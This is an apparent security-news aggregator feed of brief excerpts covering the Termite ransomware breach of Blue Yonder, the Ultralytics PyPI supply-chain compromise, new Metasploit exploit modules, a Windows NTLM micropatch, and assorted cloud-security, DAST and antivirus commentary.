from
The Cyber ExpressLast month’s attack on supply chain management platform Blue Yonder has been attributed to a new ransomware group known as “Termite.” The Cyble researchers said Termite ransomware is “a new and growing threat in the cyber landscape, leveraging advanced tactics such as double extortion to maximize its impact on victims. The full Cyble blog digs deep into Termite ransomware’s processes, including indicators of compromise (IoCs) and MITRE ATT&CK techniques.....
from
thexssrat @ MediumAPIs (Application Programming Interfaces) are integral to modern applications, facilitating communication between services and enabling rich user experiences. This article provides a comprehensive technical overview of Broken Authentication vulnerabilities in APIs, methods to test for them, and strategies to integrate their detection into your bug bounty methodology. Exploit Implementation Flaws: Leverage weaknesses like improper password handling or insecure session management.....
from
Dark Reading:It's a useful tool, as Microsoft pointed out in its expansion announcement on Dec. 6: "It's now possible to quickly find and get back to apps, websites, images, or documents just by describing its content." The tech giant appears to be taking those concerns seriously; in June, it beefed up its planned privacy and security features for Recall, including data encryption, turning Recall off by default, and requiring users to enroll in Windows Hello biometrics authentication to prove they're presen....
from
Rapid7 BlogIt adds 9 new modules, which will get you remote code execution on products such as Ivanti Connect Secure, VMware vCenter Server, Asterisk, Fortinet FortiManager and Acronis Cyber Protect. Description: This adds a new X11 library and module that uses it to remotely capture key presses from open X servers. Description: Adds an exploit module for a CRLF injection vulnerability in Ivanti Connect Secure to achieve remote code execution.....
from
Crowdstrike BlogCloud-native applications, often overlooked in cloud security strategies, have become prime targets as organizations grow more reliant on them. This visibility encompasses all microservices, APIs, data flows and dependencies, providing a comprehensive view of application architectures. Finally, the process is real-time and continuous, making it useful for understanding applications as they exist in production.....
from
BleepingComputerFor Google Colab accounts, owners got flagged and banned due to "abusive activity." "We confirm that Ultralytics versions 8.3.41 and 8.3.42 were compromised by a malicious code injection targeting cryptocurrency mining. Our team is conducting a full security audit and implementing additional safeguards to prevent similar incidents."....
from
The Register - SecuritySection 105 requires a carrier to make certain that any interception of communications can only be carried out with lawful authorization. The FCC also wants these network service providers to submit an annual certification attesting they have created, updated, and implemented a cybersecurity risk management plan. The situation is so dire the US Cybersecurity and Infrastructure Security Agency (CISA) issued guidance this week including advice on using encrypted messaging to protect information –....
from
The Record by Recorded FuturePanasonic-owned software giant Blue Yonder said several of its customers’ systems are back up and running, as the gang allegedly behind the incident came forward on Friday to boast about troves of stolen data. At least one security firm said Blue Yonder had been attacked by another ransomware gang in 2021. Before moving back to New York City, he worked for news outlets in South Africa, Jordan and Cambodia.....
from
Crowdstrike BlogCloud security solutions must also deliver real-time threat detection and automated response to stay ahead of rapidly evolving threats. Our recent acquisitions of Bionic (ASPM), Flow Security (DSPM) and Adaptive Shield (SSPM) will further expand our capabilities to help customers protect their data and reduce application risk in the cloud. CrowdStrike’s growth trajectory speaks to the trust that organizations place in Falcon Cloud Security.....
from
BleepingComputerThe Termite ransomware gang has officially claimed responsibility for the November breach of software as a service (SaaS) provider Blue Yonder. Its list of over 3,000 customers includes other high-profile companies like Microsoft, Renault, Bayer, Tesco, Lenovo, DHL, 3M, Ace Hardware, Procter & Gamble, Carlsberg, Dole, Wallgreens, Western Digital, and 7-Eleven. BleepingComputer had previously heard that Termite was behind the attack on Blue Yonder, but this could not be independently confirmed.....
from
ReversingLabsFinally a clean version, 8.3.43, was published on the same day, resolving this supply chain attack. This supply chain compromise had the potential to impact a huge number of users since ultralytics (see RL Spectra Assure Community listing) is a GitHub project with more than 30,000 stars — and the PyPI package shows about 60 million downloads. But it is not hard to imagine what the potential impact and the damage could be if threat actors decided to plant more aggressive malware like backdoors o....
from
BleepingComputerWhile 0Patch is not sharing further details about the vulnerability, BleepingcComputer understands that it forces an outbound NTLM connection to a remote share. PRO and Enterprise accounts have already received the security micropatch automatically unless their configuration explicitly prevents this. BleepingComputer has contacted Microsoft asking about the flaw and its plans to address it, but we are still waiting for a response.....
from
Horizon3.aiWhile trivial, this attack path demonstrates the pervasive issue of poor data segmentation, especially with regard to files repositories such as network shares and cloud syncing solutions. User passwords or access keys are not the only types of credential to be found through data pilfering. NodeZero is able to analyze files from any source for secrets on a scale only possible through extensive automation.....
from
SOC PrimeThey may be used by those companies to build a profile of your interests and show you relevant adverts on other sites. They do not store directly personal information, but are based on uniquely identifying your browser and internet device. They may be used by those companies to build a profile of your interests and show you relevant adverts on other sites.....
from
Dark Reading:The latest survey of software, known as Census III, found that packages for Python software and those meant to connect developers with specific cloud services — such as a toolkit for Amazon's Elastic Computing Cloud (EC2) or the API for connecting Go programs to Google Cloud — have become much more popular and, thus, critical to software development. As a result, the census breaks out npm downloads from those for other software ecosystems. The data does not address how often developers encounte....
from
InvictiWhile ostensibly free, open-source DAST tools can be resource-intensive to set up, run, integrate, and verify results, making them less suitable for organizations. In fact, several commercial DAST scanners are essentially ZAP wrappers that build on top of the open-source scan engine to make it more usable for organizations. Scan quality: Ensure the DAST tool can test a variety of web technologies and detect all common vulnerability types while also minimizing false positives.....
from
GBHackers On SecuritySubject redaction, a tactic employed by threat actors to obfuscate malicious email content, was most prevalent in finance, insurance, manufacturing, mining, healthcare, and retail. Cofense Intelligence found a significant correlation between redacted subject lines and .HTM/.HTML attachments in credential phishing emails, which are often embedded with the recipient’s email address, mimic legitimate login pages, increasing the likelihood of successful attacks. Less common but still prevalent are ....
from
ZDNet | security RSSBitdefender can be a bit slow to set up, but once it's ready, the antivirus is unobtrusive and will only alert you as necessary. It is important to look for antivirus software and apps that not only attack existing threats, but prevent you from facing new ones, too. Instead, pairing reputable antivirus software with other security methods, including using VPNs, strong passwords, 2FA, and being mindful of phishing tactics, will serve you best.....